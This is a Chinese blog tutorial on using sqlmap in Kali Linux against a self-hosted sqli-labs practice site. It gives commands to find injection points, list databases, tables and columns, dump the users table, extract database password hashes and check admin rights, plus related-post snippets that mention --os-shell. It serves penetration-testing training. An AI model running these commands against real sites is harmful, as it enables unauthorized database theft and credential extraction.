kali——sqlmap的使用

已于 2024-11-06 15:08:44 修改
阅读量1.6k 收藏 29
点赞数 35
分类专栏: kali 文章标签: 安全
于 2024-08-29 20:00:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bunengyongzho666/article/details/141652728
版权

目录

前言

sqlmap在kali中的使用

检测注入点

产看所有数据库

查看当前网站使用的数据库

产看数据表

查看字段

查看字段数据

查看数据库用户

查看所有用户

获取数据库用户密码

查看用户权限

判断当前数据库用户是否是管理员

自动化扫描

批量自动化扫描

post请求注入

cookie注入

前言

sqlmap是一款强大的开源自动化SQL注入工具,主要用于检测和利用SQL注入漏洞,协助渗透测试人员快速发现和验证web应用程序中的SQL注入缺陷。

实际渗透测试中,只要kali机能够上网就可以直接使用sqlmap;这里我们在centos上搭建sqlibs靶场做靶机,kali机为攻击机。

然后将kali机的dns为服务机centos的dns,这样kali机就可以访问centos上的网站了。

sqlmap在kali中的使用

检测注入点

sqlmap -u 完整url             //检测过程中需要手动输入y/n,即是否继续进行sql注入检测
sqlmap -u 完整url --batch     //检测过程中默认继续进行sql注入检测

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --batch

可以看到一共扫到了四种类型的sql注入漏洞,以及漏洞使用方法:

产看所有数据库

sqlmap -u 完整url --dbs

sqlmap -u  http://www.sqlibs.com/Less-1/?id=1 --dbs

查看当前网站使用的数据库

sqlmap -u 完整url --current-db

sqlmap -u  http://www.sqlibs.com/Less-1/?id=1 --current-db

可以看到使用的数据库是security

产看数据表

sqlmap -u 完整url -D '数据库名' --tables

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 -D 'security' --tables

可以看到数据库security有四张表:emails、referers、uagents、users

查看字段

sqlmap -u 完整url -D '数据库名' -T '表名' --columns

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 -D 'security' -T 'users' --columns

可以看到users表有三个字段:id、password、username

查看字段数据

sqlmap -u 完整url -D '数据库名' -T '表名' --dump

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 -D 'security' -T 'users' --dump

可以看到users表的三个字段及其数据

查看数据库用户

sqlmap -u 完整url --current-user

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --current-user

查看所有用户

sqlmap -u 完整url --users

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --users

获取数据库用户密码

sqlmap -u 完整url --passwords

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --passwords

查看用户权限

sqlmap -u 完整url --privileges

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --privileges

判断当前数据库用户是否是管理员

sqlmap -u 完整url --is-dba

sqlmap -u http://www.sqlibs.com/Less-1/?id=1 --is-dba

判断结果为True,即当前数据库用户是管理员用户。

自动化扫描

将抓到的数据包右键copy to file,然后使用kali注入

sqlmap -r '数据包路径' --dbs --batch

批量自动化扫描

新建xxx.txt文件,里面存放多个url

sqlmap -m xxx.txt

post请求注入

将抓包抓到的http请求内容存放到.txt文件中

sqlmap -r xxx.txt

cookie注入

一些需要登录的网站在用sqlmap进行注入时,需要添加cookie参数:

sqlmap -u 完整curl --cookie 'cookie'(单引号和双引号都行)

kaixiang300
关注
专栏目录
kali工具使用sqlmap教程
J546283791的博客
10-25 348
首先kali自带sqlmap:尝试一下sqlilab第一关:结果:尝试查询数据库:出现:尝试查询security下的所有表:结果:尝试查users下的所有字段:结果尝试爆破各字段所有条目:
如何在kali Linux中使用sqlmap工具
gaomei2009的专栏
06-20 1843
post请求中参数为 uname=admin*&passwd=test&submit=Submit。第一步:先判定kali Linux中sqlmap能够正常使用。在kali linux中,使用sqlmap,如上图。先遍历出数据库类型和所有的表。第二步:抓取某个页面的登陆数据包,如下。指定数据库表名sql10051008。
SQLmap使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
06-20 4万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
kali sqlmap使用方法
最新发布
2401_85233504的博客
09-15 299
2.Cookie注入sqlmap -u "http://www.example.com/index.php" --cookie="PHPSESSID=123456" --batch。1.POST请求注入sqlmap -u "http://www.example.com/login.php" --data="username=admin&password=123456" --batch。
kali工具sqlmap使用教程
qq_52805176的博客
07-13 4128
渗透测试工具sqlmap的简单使用
kali-sqlMap使用技巧
HKkkkkSky的博客
09-20 795
SQL 注入是一种代码渗透技术,是最常用的网络黑客技术之一。SQL 注入非常危险,可能会导致数据库中的数据被暴露,甚至被损坏。
kali中的sqlmap使用
yishuihanwyf的博客
12-01 1095
kalisqlmap中的简单使用
渗透工具——kaliSQLMap简介
2301_78006725的博客
09-02 869
首先,SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现、利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库有MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB。3. 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中;4. 联合查询注入,可以使用union的情况下的注入;
sql自动化注入工具——sqlmap使用
世间繁华梦一出
03-10 1285
sql漏洞自动注入工具——sqlmap一、sqlmap简介二、下载及安装三、sql使用参数详解四、sqlmap进行sql注入常规使用步骤![在这里插入图片描述](https://img-blog.csdnimg.cn/20210310165741681.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p6d3doaHBw,size_16,color_
Kali linux 学习笔记(五十一)Web渗透——sqlmap自动注入 2020.3.28
闵行小鱼塘
03-28 3257
学习sqlmap自动注入
SQL自动化注入工具——sqlmap
xy_的博客
01-18 2301
自动化工具除了sqlmap外,还有Havij、Pangolin,这里我们主要讲解sqlmap使用。 1. sqlmap 简介 sqlmap是一个开源渗透测试工具,它可以自动检测和利用SQL注入漏洞并接管数据库服务器的过程。 它具有强大的检测引擎,针对最终渗透测试仪的众多细分功能以及从数据库指纹识别,从数据库获取数据到访问基础文件系统以及通过外出在操作系统上执行命令的广泛开关。 2. 特征与功能 特征:全面支持MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Micr
SQL漏洞自动注入和数据库接管开源工具——sqlmap的介绍和保姆级使用教程
CoffeMilk的博客
09-09 1693
sqlmap是一个开源渗透测试工具,它可以自动执行检测和利用 SQL 注入漏洞来实现接管数据库服务器。它配备了一个强大的检测引擎、终极渗透测试器的许多功能,从数据库指纹识别、及数据库中获取数据,到访问底层文件系统和通过带外连接在操作系统上执行命令;功能十分强大。
kali基于sqlmap使用
ztK63LrD的博客
04-27 8972
kaliSQLmap
kali工具SQLmap基本使用方法流程以及命令解析
FRANXX_02的博客
10-06 6276
kali工具SQLmap基本使用方法流程以及命令解析
sqlmap 使用笔记(kali环境)
qq_40691438的博客
02-10 1947
sqlmap默认把session文件跟结果文件保存在output文件夹下,用此参数可自定义输出路径 例如:–当请求是HTTPS的时候,需要配合–force-ssl参数来使用,或者可以在Host头后面加上:443。在有些时候web服务器使用了伪静态,导致无法直接使用sqlmap测试参数,可以在想测试的参数后面加*用–os-shell参数也可以模拟一个真实的shell,可以输入你想执行的命令。输出的格式可定义为:CSV,HTML,SQLITE。参数:–os-cmd,–os-shell。文件内容直接copy。
kali linux下sqlmap使用教程
龙卷风摧毁停车场
03-30 1万+
SQLMAP 有windows和linux两个版本使用,可跨系统进行操作,语法参数都相同,此处以kali linux为例进行操作 sqlmap --version 查看sqlmap版本 sqlmap -h 查看sqlmap帮助 sqlmap -hh 查看sqlmap高级帮助 使用sqlmap连接数据库 查看数据库banner信息 sqlmap -d "mysql://root:123456@47.208.229.216:3306/tiantianbao" -f --banner 查看数据库用户 sql
kali sqlmap使用笔记
N1ce_peter的blog
05-16 1137
kali sqlmap使用笔记一、-u 判断数据库类型二、获取目标所有数据库。功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 参考资料 https://www.cnblogs.com/aeolian/p/11021796.html
Kali-工具-sqlmap常见用法
weixin_44257023的博客
07-19 2985
Kali-工具-sqlmap常见用法
kalisqlmap
07-28
kalisqlmap是一个命令行工具,用于检测和利用SQL注入漏洞。它可以在Windows和Linux系统上使用,并且具有相同的语法参数。你可以使用"sqlmap --version"命令来查看kalisqlmap的版本信息,使用"sqlmap -h"命令来查看帮助信息,以及使用"sqlmap -hh"命令来查看高级帮助信息。\[1\] 如果你想在使用kalisqlmap时将默认选项设置为全是"y",你可以使用"sqlmap -u URL --batchsqlsqlmsql"命令。如果遇到无法连接到目标信息的问题,你可以尝试将"sqlmap"的值更改为任意值,例如"sqlmap -u URL --random-agent"。\[2\] 此外,你还可以使用kalisqlmap连接到数据库并执行一些操作。例如,你可以使用"sqlmap -d 'mysql://root:123456@47.208.229.216:3306/tiantianbao' -f --banner"命令来查看数据库的banner信息,使用"sqlmap -d 'mysql://root:123456@47.208.229.216:3306/tiantianbao' -f --banner --users"命令来查看数据库的用户信息。\[3\] #### 引用[.reference_title] - *1* *3* [kali linux下sqlmap使用教程](https://blog.csdn.net/weixin_52084568/article/details/123839776)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [kali基于sqlmap使用](https://blog.csdn.net/qq_53123067/article/details/124447705)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值